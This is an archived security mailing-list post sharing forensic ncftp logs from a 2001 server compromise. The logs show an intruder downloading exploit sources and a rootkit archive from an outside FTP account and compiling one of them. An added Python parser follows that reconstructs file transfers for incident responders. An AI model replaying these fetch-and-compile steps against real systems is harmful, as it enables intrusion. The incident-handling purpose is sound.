For all those interested in some logs: this cracker has compromised another website - http://www.ac.ac.th/default.htm

Logs of commands issued by the cracker using ncftp:

- LOG - unmodified

topcities.com at Sun Sep 23 18:00:36 2001
    get ftp://accessftp:PASSWORDat_private/su.c
topcities.com at Sun Sep 23 18:44:41 2001
topcities.com at Sun Sep 23 18:50:06 2001
    get ftp://accessftp:PASSWORDat_private/bsd.c
    get ftp://accessftp:PASSWORDat_private/redhat.c
    get ftp://accessftp:PASSWORDat_private/lpd.c
    get ftp://accessftp:PASSWORDat_private/bsd-x.c
    get ftp://accessftp:PASSWORDat_private/aix.c
    get ftp://accessftp:PASSWORDat_private/apache.c
    get ftp://accessftp:PASSWORDat_private/imapd.c
    get ftp://accessftp:PASSWORDat_private/remove.c
    get ftp://accessftp:PASSWORDat_private/rip.c
topcities.com at Sun Sep 23 19:59:46 2001
    get ftp://accessftp:PASSWORDat_private/wuftpd-god.c
topcities.com at Mon Sep 24 09:51:01 2001
topcities.com at Mon Sep 24 14:07:33 2001
topcities.com at Mon Sep 24 19:37:30 2001
    get ftp://accessftp:PASSWORDat_private/zone-pre
    get ftp://accessftp:PASSWORDat_private/SEClpd.c
    get ftp://accessftp:PASSWORDat_private/t666.c

HISTORY - unmodified

get su.c
quit
ls
get su.c
quit
ls
quit
ls
get su.c
gcc -o su su.c
quit
ls
get bsd.c
get redhat.c
get lpd.c
get bsd-x..c
get bsd-x.c
getaix.c
get aix.c
get apache.c
get imapd.c
get remove.c
get rip.c
get rpc.autofsd.c
get wu-scan.c
quit
get wu.c
ls
get wuftpd-god.c
quit
ls
exit
ls
get zone-pre
get SEClpd
get SEClpd.c
get t666.c
get rpc.c
quit

[root@www .ncftp]# vi trace -- modified to protect someone

SESSION STARTED at: Mon Sep 24 19:37:15 2001
   Program Version: NcFTP 3.0.0/354 October 04 1999, 04:17 AM
   Library Version: LibNcFTP 3.0b3 (October 2, 1999)
        Process ID: 13472
          Platform: linux-x86
             Uname: Linux|www.COMPROMISED.com.sg|2.2.14-5.0smp|#1 SMP Tue Mar 7 21:01:40 EST 2000|i686^M
          Hostname: www.COMPROMISED.com.sg (rc=2)
19:37:15 Fw: firewall.COMPROMISED.com.sg Type: 0 User: jogja Pass: ******** Port: 21
19:37:15 FwExceptions: .COMPROMISED.com.sg,localhost,localdomain
19:37:15 Resolving topcities.com...
19:37:16 Connecting to 64.152.192.119...
19:37:17 Remote server is running NcFTPd.
19:37:17 Logging in...
19:37:17 220: topcities.com NcFTPd Server (licensed copy) ready.
19:37:17 Connected to 64.152.192.119.
19:37:17 Cmd: USER accessftp
19:37:28 331: User accessftp okay, need password.
19:37:28 Cmd: PASS xxxxxxxx
19:37:29 Logging in...
19:37:29 230: #######################################################################
19:37:29 #######################################################################
19:37:29 
19:37:29 Welcome, accessftp. You are now logged into your account.
19:37:29 
19:37:29 Your web site address: http://accessftp.topcities.com
19:37:29 You are connected from IP Address: [COMPROMISED HOST IP]
19:37:29 Space limit for your account: 153600000 bytes
19:37:29 Space used: 5377648 bytes
19:37:29 Maximum per-file size: 900 Kb
19:37:29 Upload bandwidth limit: 5 kB/sec
19:37:29 Download bandwidth limit: 2 kB/sec
19:37:29 PT: 0.20
19:37:29 
19:37:29 Note: Please do not exceed your account quota by uploading files
19:37:29 larger than 900Kb or exceeding your space limit. If you do, subsequent
19:37:29 uploads will be unsucessful without notice to you.
19:37:29 
19:37:29 #######################################################################
19:37:29 #######################################################################
19:37:29 
19:37:29 
19:37:29 
19:37:29 Restricted user logged in.
19:37:29 Cmd: PWD
19:37:29 257: "/" is cwd.
19:37:29 Logged in to 64.152.192.119 as accessftp.
19:37:29 Cmd: FEAT
19:37:30 211: Extensions supported:
19:37:30 CLNT
19:37:30 MDTM
19:37:30 MLST type*;size*;modify*;UNIX.mode*;UNIX.owner;UNIX.uid;UNIX.group;UNIX.gid;unique
19:37:30 PASV
19:37:30 REST STREAM
19:37:30 SIZE
19:37:30 TVFS
19:37:30 Compliance Level: 19981201 (IETF mlst-05)
19:37:30 End.
19:37:30 Cmd: HELP SITE
19:37:30 214: The following SITE commands are recognized:
19:37:30 
19:37:30 Logged in to topcities.com.
19:37:30 Cmd: CLNT NcFTP 3.0.0 linux-x86
19:37:31 200: Noted.
19:37:42 > ls
19:37:42 Cmd: OPTS MLST type;size;modify;UNIX.mode;UNIX.owner;UNIX.uid;UNIX.group;UNIX.gid
19:37:42 200: Options accepted: type;size;modify;UNIX.mode;UNIX.uid;UNIX.gid
19:37:42 Cmd: PASV
19:37:42 227: Entering Passive Mode (64,152,192,119,11,87)
19:37:43 Cmd: MLSD
19:37:43 150: Data connection accepted from [COMPROMISED HOST IP]:3758; transfer starting.
19:37:44 226: Listing completed.
19:37:44 Remote listing contents {
19:37:44 type=cdir;modify=20010923154433;UNIX.mode=0777;UNIX.uid=99;UNIX.gid=99 /
19:37:44 type=file;size=229995;modify=20010918134314;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 GaP.tcl
19:37:44 type=dir;modify=20010922190607;UNIX.mode=0755;UNIX.uid=99;UNIX.gid=99 IIS
19:37:44 type=file;size=9911;modify=20010918055419;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 SEClpd.c
19:37:44 type=file;size=44356;modify=20010915112702;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 VBTERM.ZIP
19:37:44 type=dir;modify=20010818023652;UNIX.mode=0777;UNIX.uid=99;UNIX.gid=99 _data
19:37:44 type=file;size=3543;modify=20010923093715;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 aix.c
19:37:44 type=file;size=55871;modify=20010911095825;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 allchan.tcl
19:37:44 type=file;size=6242;modify=20010915094640;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 amountdexp.zip
19:37:44 type=file;size=3066;modify=20010923094606;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 apache.c
19:37:44 type=file;size=5241;modify=20010911102601;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 ascii.tcl
19:37:44 type=file;size=24973;modify=20010919175706;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 bsd-x.c
19:37:44 type=file;size=25979;modify=20010913114244;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 bsd.c
19:37:44 type=file;size=53057;modify=20010911102624;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 fonts.txt
19:37:44 type=dir;modify=20010917133407;UNIX.mode=0755;UNIX.uid=99;UNIX.gid=99 ftp
19:37:44 type=file;size=3626;modify=20010911090829;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 host.tcl
19:37:44 type=file;size=3332;modify=20010915102000;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 imapd.c
19:37:44 type=file;size=2886;modify=20010919011110;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 index.htm
19:37:44 type=file;size=1784;modify=20010922040601;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 loadnc.asp
19:37:44 type=file;size=2516;modify=20010911121619;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 lpd.c
19:37:44 type=file;size=3726;modify=20010918075807;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 named.htm
19:37:44 type=file;size=75482;modify=20010919130336;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 nc110.tgz
19:37:44 type=file;size=2003;modify=20010911095755;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 ns.tcl
19:37:44 type=file;size=7127;modify=20010917160516;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 oftpd.tar.gz
19:37:44 type=file;size=689;modify=20010915095601;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 p3-sunos.tar.gz
19:37:44 type=file;size=29;modify=20010911180121;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 ps.txt
19:37:44 type=file;size=87;modify=20010911103054;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 psy.txt
19:37:44 type=file;size=197126;modify=20010905125107;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 psyBNC2.2.tar.gz
19:37:44 type=file;size=5181;modify=20010923104845;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 redhat.c
19:37:44 type=file;size=5101;modify=20010923164829;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 remove.c
19:37:44 type=file;size=5553;modify=20010911123908;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 rip.c
19:37:44 type=file;size=2721;modify=20010923130108;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 rkit.tar.gz
19:37:44 type=file;size=3341;modify=20010912062001;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 rpc.autofsd.c
19:37:44 type=file;size=2837;modify=20010923151532;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 rpc.c
19:37:44 type=file;size=2924;modify=20010912055334;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 rpcBSD.tar.gz
19:37:44 type=file;size=19119;modify=20010911125301;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 statdx.c
19:37:44 type=file;size=11990;modify=20010911121600;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 su.c
19:37:44 type=file;size=7394;modify=20010922100655;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 sunbrute.c
19:37:44 type=file;size=19809;modify=20010912055508;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 t666.c
19:37:44 type=file;size=242007;modify=20010921110904;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 tel.zip
19:37:44 type=file;size=2502;modify=20010919184357;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 unicode.txt
19:37:44 type=file;size=145408;modify=20010921111014;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 unzip.exe
19:37:44 type=file;size=492;modify=20010922040606;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 upload.asp
19:37:44 type=file;size=5867;modify=20010922040613;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 upload.inc
19:37:44 type=file;size=2095;modify=20010918063433;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 wu-scan.c
19:37:44 type=file;size=20964;modify=20010918085052;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 wuftpd-god.c
19:37:44 type=file;size=19343;modify=20010913115048;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 wuftpd.c
19:37:44 type=file;size=10244;modify=20010923154437;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 zone-pre
19:37:44 }
19:37:44 aix.c           IIS/              psy.txt        t666.c
19:37:44 allchan.tcl     imapd.c           redhat.c       tel.zip
19:37:44 amountdexp.zip  index.htm         remove.c       unicode.txt
19:37:44 apache.c        loadnc.asp        rip.c          unzip.exe
19:37:44 ascii.tcl       lpd.c             rkit.tar.gz    upload.asp
19:37:44 bsd.c           named.htm         rpc.autofsd.c  upload.inc
19:37:44 bsd-x.c         nc110.tgz         rpcBSD.tar.gz  VBTERM.ZIP
19:37:44 _data/          ns.tcl            rpc.c          wuftpd.c
19:37:44 fonts.txt       oftpd.tar.gz      SEClpd.c       wuftpd-god.c
19:37:44 ftp/            p3-sunos.tar.gz   statdx.c       wu-scan.c
19:37:44 GaP.tcl         ps.txt            su.c           zone-pre
19:37:44 host.tcl        psyBNC2.2.tar.gz  sunbrute.c
19:38:01 > get zone-pre
19:38:01 Cmd: TYPE I
19:38:01 200: Type okay.
19:38:01 Cmd: MLST zone-pre
19:38:02 250: Begin
19:38:02 type=file;size=10244;modify=20010923154437;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 /zone-pre
19:38:02 End.
19:38:02 Cmd: PASV
19:38:02 227: Entering Passive Mode (64,152,192,119,11,88)
19:38:02 Cmd: RETR zone-pre
19:38:03 150: Data connection accepted from [COMPROMISED HOST IP]:3759; transfer starting for zone-pre (10244 bytes).
19:38:05 226: Transfer completed.
19:38:29 > get SEClpd
19:38:29 Cmd: MLST SEClpd
19:38:30 550: No such file or directory.
19:38:30 Cmd: SIZE SEClpd
19:38:30 550: No such file.
19:38:30 Cmd: PASV
19:38:30 227: Entering Passive Mode (64,152,192,119,11,90)
19:38:31 Cmd: RETR SEClpd
19:38:31 550: No such file.
19:38:39 > get SEClpd.c
19:38:39 Cmd: MLST SEClpd.c
19:38:39 250: Begin
19:38:39 type=file;size=9911;modify=20010918055419;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 /SEClpd.c
19:38:39 End.
19:38:39 Cmd: PASV
19:38:42 227: Entering Passive Mode (64,152,192,119,11,91)
19:38:42 Cmd: RETR SEClpd.c
19:38:42 150: Data connection accepted from [COMPROMISED HOST IP]:3761; transfer starting for SEClpd.c (9911 bytes).
19:38:44 226: Transfer completed.
19:39:36 > get t666.c
19:39:36 Cmd: MLST t666.c
19:39:37 250: Begin
19:39:37 type=file;size=19809;modify=20010912055508;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 /t666.c
19:39:37 End.
19:39:37 Cmd: PASV
19:39:37 227: Entering Passive Mode (64,152,192,119,11,93)
19:39:38 Cmd: RETR t666.c
19:39:38 150: Data connection accepted from [COMPROMISED HOST IP]:3762; transfer starting for t666.c (19809 bytes).
19:39:41 226: Transfer completed.
19:58:54 > get rpc.c
19:58:54 Cmd: MLST rpc.c
19:58:54 Remote host has closed the connection.
19:58:54 421: Disconnecting you since you were inactive for 180 seconds.
19:58:54 Passive mode refused.
19:59:11 > quit
SESSION ENDED at: Mon Sep 24 19:59:11 2001

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
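A responder working a case like the one above wants the NcFTP trace reduced to a few facts: which account logged in to which server, what the intruder asked for at the prompt, and which RETR transfers actually completed (the files that now exist on the compromised host and must be hunted for). The parser below is an added example, not code from the post or from the NcFTP project; it keys on the fixed prefixes visible in the trace above ("SESSION STARTED/ENDED at:", "HH:MM:SS Cmd: ...", "HH:MM:SS > ...", "HH:MM:SS NNN: ..."), and the sample trace is constructed from a handful of lines of that session. It goes slightly beyond the post in that it also handles STOR (upload) records and transfers cut off before their 226 reply.

```python
"""Reconstruct an intruder's file transfers from an NcFTP 3.x 'trace' file.

Added example (not part of the original post). The line shapes matched here
are the ones shown in the post's trace; the sample below is constructed from
a few of its lines, with the client address left as the post's placeholder.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

TS_LINE = re.compile(r"^(\d{2}:\d{2}:\d{2})\s(.*)$")          # "19:38:02 <rest>"
SESSION_RE = re.compile(r"^SESSION (STARTED|ENDED) at:\s+(.+)$")
TYPED_RE = re.compile(r"^> (get|put) (.+)$")                   # command typed at the ncftp prompt
CMD_RE = re.compile(r"^Cmd: (\S+)(?: (.*))?$")                 # protocol command sent to the server
REPLY_RE = re.compile(r"^(\d{3}): (.*)$")                      # server reply code + text
START_RE = re.compile(r"transfer starting for (\S+) \((\d+) bytes\)")

# Constructed sample trace, modelled on the session in the post.
SAMPLE_TRACE = """\
SESSION STARTED at: Mon Sep 24 19:37:15 2001
19:37:16 Connecting to 64.152.192.119...
19:37:17 Cmd: USER accessftp
19:37:28 331: User accessftp okay, need password.
19:37:28 Cmd: PASS xxxxxxxx
19:37:29 230: Welcome, accessftp. You are now logged into your account.
19:38:01 > get zone-pre
19:38:01 Cmd: TYPE I
19:38:02 Cmd: RETR zone-pre
19:38:03 150: Data connection accepted from [COMPROMISED HOST IP]:3759; transfer starting for zone-pre (10244 bytes).
19:38:05 226: Transfer completed.
19:38:29 > get SEClpd
19:38:29 Cmd: MLST SEClpd
19:38:30 550: No such file or directory.
19:38:31 Cmd: RETR SEClpd
19:38:31 550: No such file.
19:38:39 > get SEClpd.c
19:38:42 Cmd: RETR SEClpd.c
19:38:42 150: Data connection accepted from [COMPROMISED HOST IP]:3761; transfer starting for SEClpd.c (9911 bytes).
19:38:44 226: Transfer completed.
19:58:54 > get rpc.c
19:58:54 Cmd: MLST rpc.c
19:58:54 Remote host has closed the connection.
19:58:54 421: Disconnecting you since you were inactive for 180 seconds.
19:59:11 > quit
SESSION ENDED at: Mon Sep 24 19:59:11 2001
"""


@dataclass
class Transfer:
    time: str
    command: str             # RETR (download to the host) or STOR (upload from it)
    path: str
    size: Optional[int] = None
    status: str = "pending"  # completed / failed / aborted


@dataclass
class Session:
    started: Optional[str] = None
    ended: Optional[str] = None
    server: Optional[str] = None
    user: Optional[str] = None
    requested: List[str] = field(default_factory=list)   # names typed after get/put
    transfers: List[Transfer] = field(default_factory=list)


def parse_trace(text: str) -> Session:
    s = Session()
    pending: Optional[Transfer] = None   # RETR/STOR still waiting for its final reply
    for raw in text.splitlines():
        m = SESSION_RE.match(raw.strip())
        if m:
            if m.group(1) == "STARTED":
                s.started = m.group(2)
            else:
                s.ended = m.group(2)
            continue
        m = TS_LINE.match(raw)
        if not m:
            continue                     # banner/uname lines carry no timestamp
        ts, rest = m.groups()
        if rest.startswith("Connecting to "):
            s.server = rest[len("Connecting to "):].rstrip(".")
            continue
        tm = TYPED_RE.match(rest)
        if tm:
            s.requested.append(tm.group(2))
            continue
        cm = CMD_RE.match(rest)
        if cm:
            verb, arg = cm.group(1).upper(), cm.group(2) or ""
            if verb == "USER":
                s.user = arg
            elif verb in ("RETR", "STOR"):
                pending = Transfer(ts, verb, arg)
                s.transfers.append(pending)
            continue
        rm = REPLY_RE.match(rest)
        if rm and pending is not None:
            code, msg = int(rm.group(1)), rm.group(2)
            if code == 150:              # data connection opened; size is in the text
                sm = START_RE.search(msg)
                if sm:
                    pending.size = int(sm.group(2))
            elif code == 226:
                pending.status = "completed"
                pending = None
            elif code >= 400:            # 550 "No such file", 421 timeout, ...
                pending.status = "failed"
                pending = None
    for t in s.transfers:                # RETR/STOR that never saw a final reply
        if t.status == "pending":
            t.status = "aborted"
    return s


def retrieved_files(session: Session) -> List[str]:
    """Files that actually landed on the host: completed RETR transfers, in order."""
    return [t.path for t in session.transfers
            if t.command == "RETR" and t.status == "completed"]


def summarize(session: Session) -> str:
    lines = [f"session {session.started} -> {session.ended}: "
             f"user {session.user} on {session.server}"]
    for t in session.transfers:
        size = f"{t.size} bytes" if t.size is not None else "size unknown"
        lines.append(f"  {t.time} {t.command} {t.path}: {t.status} ({size})")
    missing = [r for r in session.requested if r not in retrieved_files(session)]
    lines.append("  requested but not retrieved: " + ", ".join(missing))
    return "\n".join(lines)


if __name__ == "__main__":
    print(summarize(parse_trace(SAMPLE_TRACE)))
```

Run against the real ~/.ncftp/trace of a compromised host, the completed RETR names become the first search list for the filesystem (and, paired with the ~/.ncftp/history shown above, a check on whether anything was compiled from them); the "requested but not retrieved" line keeps the attempts that failed, which matter for attribution even though nothing landed.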
This archive was generated by hypermail 2b30 : Wed Sep 26 2001 - 08:25:37 PDT